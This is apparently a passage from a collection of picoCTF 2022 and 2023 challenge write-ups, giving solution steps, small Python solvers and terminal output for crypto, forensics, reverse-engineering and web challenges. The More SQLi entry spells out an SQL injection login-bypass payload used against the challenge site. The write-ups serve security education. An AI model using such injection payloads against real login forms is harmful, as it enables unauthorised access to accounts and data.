79 | 80 | 81 | 82 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2022/Web_Exploitation/Roboto_Sans] 83 | └─$ curl http://saturn.picoctf.net:59901/js/myfile.txt 84 | picoCTF{} 85 | ``` 86 | 87 | For additional information, please see the references below. 88 | 89 | ## References 90 | 91 | - [base64 - Linux manual page](https://man7.org/linux/man-pages/man1/base64.1.html) 92 | - [Base64 - Wikipedia](https://en.wikipedia.org/wiki/Base64) 93 | - [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html) 94 | - [robots.txt - Wikipedia](https://en.wikipedia.org/wiki/Robots.txt) 95 | -------------------------------------------------------------------------------- /picoCTF_2023/Binary_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Binary Exploitation Challenges 2 | 3 | ## Medium Binary Exploitation Challenges 4 | 5 | - [babygame01](babygame01.md) 6 | - [hijacking](hijacking.md) 7 | - [two-sum](two-sum.md) 8 | - [VNE](VNE.md) 9 | 10 | ## Hard Binary Exploitation Challenges 11 | 12 | - [tic-tac](tic-tac.md) 13 | -------------------------------------------------------------------------------- /picoCTF_2023/Binary_Exploitation/Twos_complement.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Binary_Exploitation/Twos_complement.png -------------------------------------------------------------------------------- /picoCTF_2023/Cryptography/README.md: -------------------------------------------------------------------------------- 1 | # Cryptography Challenges 2 | 3 | ## Medium Cryptography Challenges 4 | 5 | - [HideToSee](HideToSee.md) 6 | - [ReadMyCert](ReadMyCert.md) 7 | - [rotation](rotation.md) 8 | -------------------------------------------------------------------------------- /picoCTF_2023/Cryptography/rotation.md: -------------------------------------------------------------------------------- 1 | # rotation 2 | 3 | - [Challenge information](#challenge-information) 4 | - [CyberChef solution](#cyberchef-solution) 5 | - [Python solution](#python-solution) 6 | - [References](#references) 7 | 8 | ## Challenge information 9 | 10 | ```text 11 | Level: Medium 12 | Tags: picoCTF 2023, Cryptography 13 | Author: LOIC SHEMA 14 | 15 | Description: 16 | You will find the flag after decrypting this file 17 | 18 | Download the encrypted flag here. 19 | 20 | Hints: 21 | 1. Sometimes rotation is right 22 | ``` 23 | 24 | Challenge link: [https://play.picoctf.org/practice/challenge/373](https://play.picoctf.org/practice/challenge/373) 25 | 26 | ## CyberChef solution 27 | 28 | Open the file in [CyberChef](https://gchq.github.io/CyberChef/) and use the 'ROT13' recipe. 29 | The default rotation is 13 steps. Change the amount until you find the flag. The correct amount is 18. 30 | 31 | ## Python solution 32 | 33 | Even though it takes a bit longer time it's more fun to write a small python script called `solve.py` to bruteforce the challenge. 34 | 35 | ```python 36 | #!/usr/bin/python 37 | 38 | import string 39 | 40 | alphabet = string.ascii_lowercase 41 | alpha_len = len(alphabet) 42 | 43 | def shift(cipher_text, key): 44 | result = '' 45 | for c in cipher_text: 46 | if c.islower(): 47 | result += alphabet[(alphabet.index(c) + key) % alpha_len] 48 | elif c.isupper(): 49 | result += alphabet[(alphabet.index(c.lower()) + key) % alpha_len].upper() 50 | else: 51 | result += c 52 | return result 53 | 54 | # Read the encoded flag 55 | with open("encrypted.txt", 'r') as fh: 56 | enc_flag = fh.read().strip() 57 | 58 | for i in range(1, alpha_len+1): 59 | plain = shift(enc_flag, i) 60 | if ('picoCTF' in plain): 61 | print("ROT-%02d: %s" % (i, plain)) 62 | ``` 63 | 64 | Then make the script executable and run it 65 | 66 | ```bash 67 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/Cryptography/rotation] 68 | └─$ chmod +x solve.py 69 | 70 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/Cryptography/rotation] 71 | └─$ ./solve.py 72 | ROT-18: picoCTF{} 73 | ``` 74 | 75 | For additional information, please see the references below. 76 | 77 | ## References 78 | 79 | - [CyberChef - Homepage](https://gchq.github.io/CyberChef/) 80 | - [python - Linux manual page](https://linux.die.net/man/1/python) 81 | - [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language)) 82 | - [ROT13 - Wikipedia](https://en.wikipedia.org/wiki/ROT13) 83 | -------------------------------------------------------------------------------- /picoCTF_2023/Forensics/PcapPoisoning.md: -------------------------------------------------------------------------------- 1 | # PcapPoisoning 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2023, Forensics, pcap 12 | Author: MUBARAK MIKAIL 13 | 14 | Description: 15 | How about some hide and seek heh? 16 | Download this file and find the flag. 17 | 18 | Hints: 19 | (None) 20 | ``` 21 | 22 | Challenge link: [https://play.picoctf.org/practice/challenge/362](https://play.picoctf.org/practice/challenge/362) 23 | 24 | ## Solution 25 | 26 | Open the PCAP-file in [Wireshark](https://www.wireshark.org/) and let's take the description more or less literally by just assuming the flag are available in plain in the packet capture. 27 | 28 | Set a display filter of `tcp.payload contains "picoCTF"` and press Enter. 29 | 30 | Ah, only one packet matches and the flag is indeed visible in the ASCII details of the packet. 31 | 32 | ## References 33 | 34 | - [Wireshark - Display Filters](https://wiki.wireshark.org/DisplayFilters) 35 | - [Wireshark - Homepage](https://www.wireshark.org/) 36 | -------------------------------------------------------------------------------- /picoCTF_2023/Forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics Challenges 2 | 3 | ## Medium Forensics Challenges 4 | 5 | - [FindAndOpen](FindAndOpen.md) 6 | - [hideme](hideme.md) 7 | - [MSB](MSB.md) 8 | - [PcapPoisoning](PcapPoisoning.md) 9 | 10 | ### Hard Forensics Challenges 11 | 12 | - [Invisible WORDs](Invisible_WORDs.md) 13 | -------------------------------------------------------------------------------- /picoCTF_2023/Forensics/StegSolve_MSB_data_extraction.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Forensics/StegSolve_MSB_data_extraction.png -------------------------------------------------------------------------------- /picoCTF_2023/General_Skills/README.md: -------------------------------------------------------------------------------- 1 | # General Skills Challenges 2 | 3 | ## Easy General Skills Challenges 4 | 5 | - [repetitions](repetitions.md) 6 | 7 | ## Medium General Skills Challenges 8 | 9 | - [chrono](chrono.md) 10 | - [Permissions](Permissions.md) 11 | - [Special](Special.md) 12 | - [Specialer](Specialer.md) 13 | - [useless](useless.md) 14 | -------------------------------------------------------------------------------- /picoCTF_2023/General_Skills/repetitions.md: -------------------------------------------------------------------------------- 1 | # repetitions 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Easy 11 | Tags: picoCTF 2023, General Skills, base64 12 | Author: THEONESTE BYAGUTANGAZA 13 | 14 | Description: 15 | Can you make sense of this file? 16 | 17 | Download the file here. 18 | 19 | Hints: 20 | 1. Multiple decoding is always good. 21 | ``` 22 | 23 | Challenge link: [https://play.picoctf.org/practice/challenge/371](https://play.picoctf.org/practice/challenge/371) 24 | 25 | ## Solution 26 | 27 | One of the tags already gave it away. The contents of the file is [base64 encoded data](https://en.wikipedia.org/wiki/Base64). 28 | 29 | Otherwise, a good indicator for base64 encoded data is a string ending with one or two equal signs ('=') and 30 | that the string contains nothing but letters and numbers (with three exceptions: '+', '/', and '='). 31 | The ('=') is padding in base64 encoding. 32 | 33 | The contents of the file is 34 | 35 | ```text 36 | VmpGU1EyRXlUWGxTYmxKVVYwZFNWbGxyV21GV1JteDBUbFpPYWxKdFVsaFpWVlUxWVZaS1ZWWnVh 37 | RmRXZWtab1dWWmtSMk5yTlZWWApiVVpUVm10d1VWZFdVa2RpYlZaWFZtNVdVZ3BpU0VKeldWUkNk 38 | MlZXVlhoWGJYQk9VbFJXU0ZkcVRuTldaM0JZVWpGS2VWWkdaSGRXCk1sWnpWV3hhVm1KRk5XOVVW 39 | VkpEVGxaYVdFMVhSbFZhTTBKUFdXdGtlbVF4V2tkWGJYUllDbUY2UWpSWmEyaFRWakpHZEdWRlZs 40 | aGkKYlRrelZERldUMkpzUWxWTlJYTkxDZz09Cg== 41 | ``` 42 | 43 | Both the challenge name and the hint suggests that we need to do a number of decoding levels to get our flag. 44 | 45 | We probably could get away with manually applying a number of ['From Base64' recipes in CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)) but let's write a little Python script called `solve.py` instead that automatically finds the flag in any number of base64 layers. 46 | 47 | ```python 48 | #!/usr/bin/python 49 | 50 | import base64 51 | 52 | # Read the encoded flag 53 | with open("enc_flag", 'r') as fh: 54 | enc_flag = fh.read() 55 | 56 | while ('picoCTF' not in enc_flag): 57 | enc_flag = base64.b64decode(enc_flag).decode('ascii') 58 | 59 | print(enc_flag) 60 | ``` 61 | 62 | Then make the script executable and run it 63 | 64 | ```bash 65 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/General_Skills/repetitions] 66 | └─$ chmod +x solve.py 67 | 68 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/General_Skills/repetitions] 69 | └─$ ./solve.py 70 | picoCTF{} 71 | ``` 72 | 73 | For additional information, please see the references below. 74 | 75 | ## References 76 | 77 | - [Base64 - Wikipedia](https://en.wikipedia.org/wiki/Base64) 78 | - [base64 module - Python](https://docs.python.org/3/library/base64.html) 79 | - [CyberChef - Homepage](https://gchq.github.io/CyberChef/) 80 | - [python - Linux manual page](https://linux.die.net/man/1/python) 81 | - [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language)) 82 | -------------------------------------------------------------------------------- /picoCTF_2023/README.md: -------------------------------------------------------------------------------- 1 | # picoCTF 2023 Challenges 2 | 3 | ## Binary Exploitation Challenges 4 | 5 | ### Medium Binary Exploitation Challenges 6 | 7 | - [babygame01](Binary_Exploitation/babygame01.md) 8 | - [hijacking](Binary_Exploitation/hijacking.md) 9 | - [two-sum](Binary_Exploitation/two-sum.md) 10 | - [VNE](Binary_Exploitation/VNE.md) 11 | 12 | ### Hard Binary Exploitation Challenges 13 | 14 | - [tic-tac](Binary_Exploitation/tic-tac.md) 15 | 16 | ## Cryptography Challenges 17 | 18 | ### Medium Cryptography Challenges 19 | 20 | - [HideToSee](Cryptography/HideToSee.md) 21 | - [ReadMyCert](Cryptography/ReadMyCert.md) 22 | - [rotation](Cryptography/rotation.md) 23 | 24 | ## Forensics Challenges 25 | 26 | ### Medium Forensics Challenges 27 | 28 | - [FindAndOpen](Forensics/FindAndOpen.md) 29 | - [hideme](Forensics/hideme.md) 30 | - [MSB](Forensics/MSB.md) 31 | - [PcapPoisoning](Forensics/PcapPoisoning.md) 32 | 33 | ### Hard Forensics Challenges 34 | 35 | - [Invisible WORDs](Forensics/Invisible_WORDs.md) 36 | 37 | ## General Skills Challenges 38 | 39 | ### Easy General Skills Challenges 40 | 41 | - [repetitions](General_Skills/repetitions.md) 42 | 43 | ### Medium General Skills Challenges 44 | 45 | - [chrono](General_Skills/chrono.md) 46 | - [Permissions](General_Skills/Permissions.md) 47 | - [Special](General_Skills/Special.md) 48 | - [Specialer](General_Skills/Specialer.md) 49 | - [useless](General_Skills/useless.md) 50 | 51 | ## Reverse Engineering Challenges 52 | 53 | ### Medium Reverse Engineering Challenges 54 | 55 | - [Ready Gladiator 0](Reverse_Engineering/Ready_Gladiator_0.md) 56 | - [Ready Gladiator 1](Reverse_Engineering/Ready_Gladiator_1.md) 57 | - [Ready Gladiator 2](Reverse_Engineering/Ready_Gladiator_2.md) 58 | - [Reverse](Reverse_Engineering/Reverse.md) 59 | - [Safe Opener 2](Reverse_Engineering/Safe_Opener_2.md) 60 | - [timer](Reverse_Engineering/timer.md) 61 | - [Virtual Machine 0](Reverse_Engineering/Virtual_Machine_0.md) 62 | 63 | ## Web Exploitation Challenges 64 | 65 | ### Medium Web Exploitation Challenges 66 | 67 | - [findme](Web_Exploitation/findme.md) 68 | - [MatchTheRegex](Web_Exploitation/MatchTheRegex.md) 69 | - [More SQLi](Web_Exploitation/More_SQLi.md) 70 | - [SOAP](Web_Exploitation/SOAP.md) 71 | -------------------------------------------------------------------------------- /picoCTF_2023/Reverse_Engineering/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering Challenges 2 | 3 | ## Medium Reverse Engineering Challenges 4 | 5 | - [Ready Gladiator 0](Ready_Gladiator_0.md) 6 | - [Ready Gladiator 1](Ready_Gladiator_1.md) 7 | - [Ready Gladiator 2](Ready_Gladiator_2.md) 8 | - [Reverse](Reverse.md) 9 | - [Safe Opener 2](Safe_Opener_2.md) 10 | - [timer](timer.md) 11 | - [Virtual Machine 0](Virtual_Machine_0.md) 12 | -------------------------------------------------------------------------------- /picoCTF_2023/Reverse_Engineering/Ready_Gladiator_1.md: -------------------------------------------------------------------------------- 1 | # Ready Gladiator 1 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2023, Reverse Engineering, CoreWars 12 | Author: LT 'SYREAL' JONES 13 | 14 | Description: 15 | Can you make a CoreWars warrior that wins? 16 | Your opponent is the Imp. The source is available here. 17 | 18 | If you wanted to pit the Imp against himself, you could download the Imp and connect to the CoreWars server like this: 19 | nc saturn.picoctf.net 62741 < imp.red 20 | 21 | To get the flag, you must beat the Imp at least once out of the many rounds. 22 | 23 | Hints: 24 | 1. You may be able to find a viable warrior in beginner docs 25 | ``` 26 | 27 | Challenge link: [https://play.picoctf.org/practice/challenge/369](https://play.picoctf.org/practice/challenge/369) 28 | 29 | ## Solution 30 | 31 | This is a continuation of the [previous challenge](Ready_Gladiator_0.md) and I started off by re-reading the [beginner's docs](https://corewars.org/docs/guide.html) in hope of finding a CoreWars warrior as the hint suggested. I wasn't very keen on coding my own warrior. 32 | 33 | ### Enter the dwarf warrior 34 | 35 | I found a warrior called 'The dwarf' and decided to try it out as an opponent to 'The Imp' 36 | 37 | ```text 38 | ;redcode 39 | ;name The Dwarf 40 | ;assert 1 41 | add #4, 3 42 | mov 2, @2 43 | jmp -2 44 | dat #0, #0 45 | end 46 | ``` 47 | 48 | ### Get the flag 49 | 50 | Then I sent the dwarf into battle 51 | 52 | ```bash 53 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2023/Reverse_Engineering/Ready_Gladiator_1] 54 | └─$ nc saturn.picoctf.net 62741 < the_dwarf.red 55 | ;redcode 56 | ;name The Dwarf 57 | ;assert 1 58 | add #4, 3 59 | mov 2, @2 60 | jmp -2 61 | dat #0, #0 62 | end 63 | Submit your warrior: (enter 'end' when done) 64 | 65 | Warrior1: 66 | ;redcode 67 | ;name The Dwarf 68 | ;assert 1 69 | add #4, 3 70 | mov 2, @2 71 | jmp -2 72 | dat #0, #0 73 | end 74 | 75 | Rounds: 100 76 | Warrior 1 wins: 26 77 | Warrior 2 wins: 0 78 | Ties: 74 79 | You did it! 80 | picoCTF{} 81 | ``` 82 | 83 | It won 26 times so I got the flag. 84 | 85 | For additional information, please see the references below. 86 | 87 | ## References 88 | 89 | - [CoreWars](https://corewars.org/) 90 | - [Beginner's guide to Redcode](https://corewars.org/docs/guide.html) 91 | -------------------------------------------------------------------------------- /picoCTF_2023/Reverse_Engineering/Safe_Opener_2.md: -------------------------------------------------------------------------------- 1 | # Safe Opener 2 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Grepping for the flag solution](#grepping-for-the-flag-solution) 5 | - [Decompiling with JD-GUI solution](#decompiling-with-jd-gui-solution) 6 | - [References](#references) 7 | 8 | ## Challenge information 9 | 10 | ```text 11 | Level: Medium 12 | Tags: picoCTF 2023, Reverse Engineering 13 | Author: MUBARAK MIKAIL 14 | 15 | Description: 16 | What can you do with this file? 17 | 18 | I forgot the key to my safe but this file is supposed to help me with retrieving the lost key. 19 | Can you help me unlock my safe? 20 | 21 | Hints: 22 | 1. Download and try to decompile the file. 23 | ``` 24 | 25 | Challenge link: [https://play.picoctf.org/practice/challenge/375](https://play.picoctf.org/practice/challenge/375) 26 | 27 | There are several ways to solve this challenge. Here are two solutions presented in increasing difficulty. 28 | 29 | ## Grepping for the flag solution 30 | 31 | On easy challenges it's always recommended to search for the flag in plain text with `strings` and `grep`. 32 | 33 | ```bash 34 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/Reverse_Engineering/Safe_Opener_2] 35 | └─$ strings -a -n 8 SafeOpener.class | grep picoCTF 36 | ,picoCTF{} 37 | ``` 38 | 39 | ## Decompiling with JD-GUI solution 40 | 41 | A more sofisticated solution is to decompile the file in [JD-GUI](https://github.com/java-decompiler/jd-gui) and study the code. 42 | 43 | You find the flag in the openSafe function (but it's redacted here). 44 | 45 | ```C 46 | public static boolean openSafe(String password) 47 | { 48 | String encodedkey = "picoCTF{}"; 49 | if (password.equals(encodedkey)) 50 | { 51 | System.out.println("Sesame open"); 52 | return true; 53 | } 54 | System.out.println("Password is incorrect\n"); 55 | return false; 56 | } 57 | ``` 58 | 59 | For additional information, please see the references below. 60 | 61 | ## References 62 | 63 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 64 | - [JD-GUI - GitHub](https://github.com/java-decompiler/jd-gui) 65 | - [String (computer science) - Wikipedia](https://en.wikipedia.org/wiki/String_(computer_science)) 66 | - [strings - Linux manual page](https://man7.org/linux/man-pages/man1/strings.1.html) 67 | -------------------------------------------------------------------------------- /picoCTF_2023/Reverse_Engineering/The_Black_Box_in_Blender.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Reverse_Engineering/The_Black_Box_in_Blender.png -------------------------------------------------------------------------------- /picoCTF_2023/Reverse_Engineering/Virtual_Machine_0.md: -------------------------------------------------------------------------------- 1 | # Virtual Machine 0 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2023, Reverse Engineering, Analog 12 | Author: LT 'SYREAL' JONES 13 | 14 | Description: 15 | Can you crack this black box? 16 | 17 | We grabbed this design doc from enemy servers: Download. 18 | 19 | We know that the rotation of the red axle is input and the rotation of the blue axle is output. 20 | The following input gives the flag as output: Download. 21 | 22 | Hints: 23 | 1. Rotating the axle that number of times is obviously not feasible. 24 | Can you model the mathematical relationship between red and blue? 25 | ``` 26 | 27 | Challenge link: [https://play.picoctf.org/practice/challenge/385](https://play.picoctf.org/practice/challenge/385) 28 | 29 | ## Solution 30 | 31 | Unzipping the given Zip-file gives you a .dae file. A format I had previously never heard about. 32 | So I googled for a program to open it with and found [Blender](https://www.blender.org/) which is free and open source. 33 | 34 | ### Physically dismantle the machine 35 | 36 | Start Blender. 37 | Then in the `File` menu, choose `Import` and `Collada (.dae)`. Select the `Virtual-Machine-0.dae` file. 38 | 39 | Zoom in and you should see the "black box" machine 40 | 41 | ![The Black Box in Blender](The_Black_Box_in_Blender.png) 42 | 43 | Now you need to dismantle the black box by selecting components and moving them away. 44 | The navigation is a bit wierd and this takes time. 45 | 46 | You need to isolated the red and blue gearwheels good enough to be able to count their number of cogs. 47 | 48 | The blue gear has 8 cogs and the red gear has 40 cogs. 49 | 50 | ### Get the flag 51 | 52 | The difference in the number of cogs is 5 (40 / 8 = 5). 53 | 54 | Then calculate an assumed hex-encoded flag in Python 55 | 56 | ```python 57 | >>> input = 39722847074734820757600524178581224432297292490103996089444214757432940313 58 | >>> difference = 5 59 | >>> hex_flag = hex(input * difference)[2:] 60 | >>> bytes.fromhex(hex_flag).decode() 61 | 'picoCTF{}' 62 | >>> 63 | ``` 64 | 65 | For additional information, please see the references below. 66 | 67 | ### References 68 | 69 | - [Blender - Homepage](https://www.blender.org/) 70 | - [python - Linux manual page](https://linux.die.net/man/1/python) 71 | - [Python (programming language) - Wikipedia](https://en.wikipedia.org/wiki/Python_(programming_language)) 72 | -------------------------------------------------------------------------------- /picoCTF_2023/Reverse_Engineering/timer.md: -------------------------------------------------------------------------------- 1 | # timer 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Grepping for the flag solution](#grepping-for-the-flag-solution) 5 | - [Decompiling with JADX-GUI solution](#decompiling-with-jadx-gui-solution) 6 | - [References](#references) 7 | 8 | ## Challenge information 9 | 10 | ```text 11 | Level: Medium 12 | Tags: picoCTF 2023, Reverse Engineering, android 13 | Author: MUBARAK MIKAIL 14 | 15 | Description: 16 | You will find the flag after analysing this apk 17 | 18 | Download here. 19 | 20 | Hints: 21 | 1. Decompile 22 | 2. mobsf or jadx 23 | ``` 24 | 25 | Challenge link: [https://play.picoctf.org/practice/challenge/381](https://play.picoctf.org/practice/challenge/381) 26 | 27 | There are several ways to solve this challenge. Here are two solutions presented in increasing difficulty. 28 | 29 | ## Grepping for the flag solution 30 | 31 | APK-files are simply a Zip-file and can be unpacked with a tool such as [7-Zip](https://www.7-zip.org/). 32 | Unpack the [APK-file](https://en.wikipedia.org/wiki/Apk_(file_format)) and then just use `grep` recursively on all the unpacked files 33 | 34 | ```bash 35 | Z:\CTFs\picoCTF\picoCTF_2023\Reverse_Engineering\timer\timer>grep -iR picoCTF * 36 | apktool.yml: versionName: picoCTF{} 37 | smali_classes3/com/example/timer/BuildConfig.smali:.field public static final VERSION_NAME:Ljava/lang/String; = "picoCTF{}" 38 | ``` 39 | 40 | As you can see the flag was present in two different files. 41 | 42 | ## Decompiling with JADX-GUI solution 43 | 44 | A more sofisticated solution is to decompile the APK-file with [Jadx-GUI](https://github.com/skylot/jadx) and study the decompiled code. 45 | 46 | Since the APK-file contains a lot of files, the fastest way to find the flag is to use the 'Text search' feature. 47 | It is available both in the Navigation-menu and as a button on the tool bar. 48 | 49 | In this case, searching for `picoCTF` just gives you one hit, in `com.example.timer.BuildConfig` 50 | 51 | ```C 52 | package com.example.timer; 53 | 54 | /* loaded from: classes3.dex */ 55 | public final class BuildConfig { 56 | public static final String APPLICATION_ID = "com.example.timer"; 57 | public static final String BUILD_TYPE = "debug"; 58 | public static final boolean DEBUG = Boolean.parseBoolean("true"); 59 | public static final int VERSION_CODE = 1; 60 | public static final String VERSION_NAME = "picoCTF{}"; 61 | } 62 | ``` 63 | 64 | For additional information, please see the references below. 65 | 66 | ## References 67 | 68 | - [7-Zip - Homepage](https://www.7-zip.org/) 69 | - [apk (file format) - Wikipedia](https://en.wikipedia.org/wiki/Apk_(file_format)) 70 | - [Jadx-GUI - GitHub](https://github.com/skylot/jadx) 71 | -------------------------------------------------------------------------------- /picoCTF_2023/Web_Exploitation/MatchTheRegex.md: -------------------------------------------------------------------------------- 1 | # MatchTheRegex 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2023, Web Exploitation 12 | Author: SUNDAY JACOB NWANYIM 13 | 14 | Description: 15 | How about trying to match a regular expression 16 | 17 | The website is running here. 18 | 19 | Hints: 20 | 1. Access the webpage and try to match the regular expression associated with the text field 21 | ``` 22 | 23 | Challenge link: [https://play.picoctf.org/practice/challenge/356](https://play.picoctf.org/practice/challenge/356) 24 | 25 | ## Solution 26 | 27 | The challenge name and description tells us that there are [Regular expressions](https://en.wikipedia.org/wiki/Regular_expression) (RegEx) involved. 28 | 29 | ### Checking the web page and source code 30 | 31 | Browsing to the web site you see: 32 | 33 | - A 'Valid Input' text 34 | - A text input field 35 | - A Submit button 36 | 37 | Let's view the source of the web page and especially the `send_request` function 38 | 39 | ```javascript 40 | function send_request() { 41 | let val = document.getElementById("name").value; 42 | // ^p.....F!? 43 | fetch(`/flag?input=${val}`) 44 | .then(res => res.text()) 45 | .then(res => { 46 | const res_json = JSON.parse(res); 47 | alert(res_json.flag) 48 | return false; 49 | }) 50 | return false; 51 | } 52 | ``` 53 | 54 | ### Analysis of the regular expression 55 | 56 | The comment in the function suggests that the regular expression matching the input is `^p.....F!?`. 57 | 58 | This means that the input should 59 | 60 | 1. Start with the lower letter 'p' 61 | 2. Then include any 5 characters ('.' matches any character) 62 | 3. Then be followed by an upper letter 'F' 63 | 4. Then have an optional '!' 64 | 65 | ### Getting the flag 66 | 67 | There are lots of different input that will match the regex above and print the flag. 68 | These are examples of some of them: 69 | 70 | - picoCTF 71 | - picoCTF! 72 | - paaaaaF 73 | - picoCTF is fun 74 | 75 | For additional information, please see the references below. 76 | 77 | ## References 78 | 79 | - [JavaScript - Wikipedia](https://en.wikipedia.org/wiki/JavaScript) 80 | - [Regular expressions - Wikipedia](https://en.wikipedia.org/wiki/Regular_expression) 81 | -------------------------------------------------------------------------------- /picoCTF_2023/Web_Exploitation/More_SQLi.md: -------------------------------------------------------------------------------- 1 | # More SQLi 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2023, Web Exploitation, sql 12 | Author: MUBARAK MIKAIL 13 | 14 | Description: 15 | Can you find the flag on this website. 16 | Try to find the flag here. 17 | 18 | Hints: 19 | 1. SQLiLite 20 | ``` 21 | 22 | Challenge link: [https://play.picoctf.org/practice/challenge/358](https://play.picoctf.org/practice/challenge/358) 23 | 24 | ## Solution 25 | 26 | ### Analyze the web page 27 | 28 | Browse to the web site and we see a login form under the heading `Security Challenge`. 29 | 30 | The hint have already told us that we should expect a [SQL injection](https://en.wikipedia.org/wiki/SQL_injection) vulnerability 31 | but let's try to login with `admin:admin` and see what happens. The following is returned to us 32 | 33 | ```text 34 | username: admin 35 | password: admin 36 | SQL query: SELECT id FROM users WHERE password = 'admin' AND username = 'admin' 37 | ``` 38 | 39 | Yes, definitely SQL injection. 40 | 41 | ### Log in with SQLi 42 | 43 | OK, let's use the SQLi vulnerability by logging in with username `qwerty` and password `' OR 1=1 -- `. 44 | We get a table but no flag visible. 45 | 46 | Next, I checked if the flag was hidden in a HTML-comment, but no... 47 | 48 | ### Get the flag 49 | 50 | However, when I checked the `HTTP history` in [Burp suite](https://portswigger.net/burp) that I had running in the background I finally found the flag in the `POST` response. 51 | 52 | ![HTTP history in Burp Suite](More_SQLi_in_Burp_Suite.png) 53 | 54 | For additional information, please see the references below. 55 | 56 | ## References 57 | 58 | - [Burp suite - Home page](https://portswigger.net/burp) 59 | - [SQL Injection - OWASP](https://owasp.org/www-community/attacks/SQL_Injection) 60 | - [SQL Injection - PortSwigger](https://portswigger.net/web-security/sql-injection) 61 | - [SQL injection - Wikipedia](https://en.wikipedia.org/wiki/SQL_injection) 62 | - [SQL injection cheat sheet - PortSwigger](https://portswigger.net/web-security/sql-injection/cheat-sheet) 63 | -------------------------------------------------------------------------------- /picoCTF_2023/Web_Exploitation/More_SQLi_in_Burp_Suite.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Web_Exploitation/More_SQLi_in_Burp_Suite.png -------------------------------------------------------------------------------- /picoCTF_2023/Web_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Web Exploitation Challenges 2 | 3 | ## Medium Web Exploitation Challenges 4 | 5 | - [findme](findme.md) 6 | - [MatchTheRegex](MatchTheRegex.md) 7 | - [More SQLi](More_SQLi.md) 8 | - [SOAP](SOAP.md) 9 | -------------------------------------------------------------------------------- /picoCTF_2023/Web_Exploitation/Redirections_in_the_findme_challenge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2023/Web_Exploitation/Redirections_in_the_findme_challenge.png -------------------------------------------------------------------------------- /picoCTF_2023/Web_Exploitation/findme.md: -------------------------------------------------------------------------------- 1 | # findme 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | 9 | ```text 10 | Level: Medium 11 | Tags: picoCTF 2023, Web Exploitation 12 | Author: GEOFFREY NJOGU 13 | 14 | Description: 15 | Help us test the form by submiting the username as test and password as test! 16 | 17 | The website running here. 18 | 19 | Hints: 20 | 1. any redirections? 21 | ``` 22 | 23 | Challenge link: [https://play.picoctf.org/practice/challenge/349](https://play.picoctf.org/practice/challenge/349) 24 | 25 | ## Solution 26 | 27 | Browse to the web site but before you login start DevTools in your browser (press F12) and navigate to the `Network` tab as the hint wants us to look for redirections. In the `Network` tab make sure you have the `Preserve Log` option enabled. 28 | 29 | Then login with `test:test!`. 30 | 31 | You will indeed see a number of redirections. [HTTP status codes](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status) in the 3xx range are redirections. 32 | 33 | ![Redirections when logging in](Redirections_in_the_findme_challenge.png) 34 | 35 | One of the `id` parameters ends with two equal signs so they are both probably base64 encoded. The '=' is padding in base64. 36 | 37 | Let's try to decode it to verify 38 | 39 | ```bash 40 | ┌──(kali㉿kali)-[/picoCTF/picoCTF_2023/Web_Explotation/findme] 41 | └─$ echo "cGljb0NURntwcm94aWVzX2Fs" | base64 -d 42 | picoCTF{proxies_al 43 | ``` 44 | 45 | Combine the parameters and you have the flag. 46 | 47 | For additional information, please see the references below. 48 | 49 | ## References 50 | 51 | - [base64 - Linux manual page](https://man7.org/linux/man-pages/man1/base64.1.html) 52 | - [Base64 - Wikipedia](https://en.wikipedia.org/wiki/Base64) 53 | - [echo - Linux manual page](https://man7.org/linux/man-pages/man1/echo.1.html) 54 | - [HTTP status 